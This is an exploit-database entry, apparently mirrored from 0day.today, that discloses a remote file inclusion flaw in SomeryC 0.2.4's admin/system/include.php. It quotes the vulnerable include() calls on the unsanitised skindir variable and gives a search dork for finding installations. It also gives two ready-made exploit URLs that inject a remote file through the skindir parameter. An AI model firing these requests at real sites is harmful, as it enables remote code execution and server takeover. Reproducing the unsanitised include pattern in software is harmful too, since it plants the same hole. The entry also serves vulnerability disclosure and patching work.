id: 2088
date: 08/26/2007
title: SomeryC <= 0.2.4 (include.php skindir) Remote File Inclusion Vulnerability
author: Katatafish
cves: 

==========================================================================
SomeryC <= 0.2.4 (include.php skindir) Remote File Inclusion Vulnerability
==========================================================================



### SomeryC <= v0.2.4 Remote File Include ###

#Vendor:        http://someryc.mostpopularcomic.com
#download       http://someryc.mostpopularcomic.com/sC024.zip

#found by: Katatafish 

#d0rk: "powered by someryc"

#vuln-code(/admin/system/include.php):

if ($start) {
....
       include("$skindir/header.php");
}
....
       include("$skindir/footer.php");

#exploit:

http://www.site.com/admin/system/include.php?skindir=[evilCode]
http://www.site.com/admin/system/include.php?start=1&skindir=[evilCode]



#  0day.today [2023-03-26]  #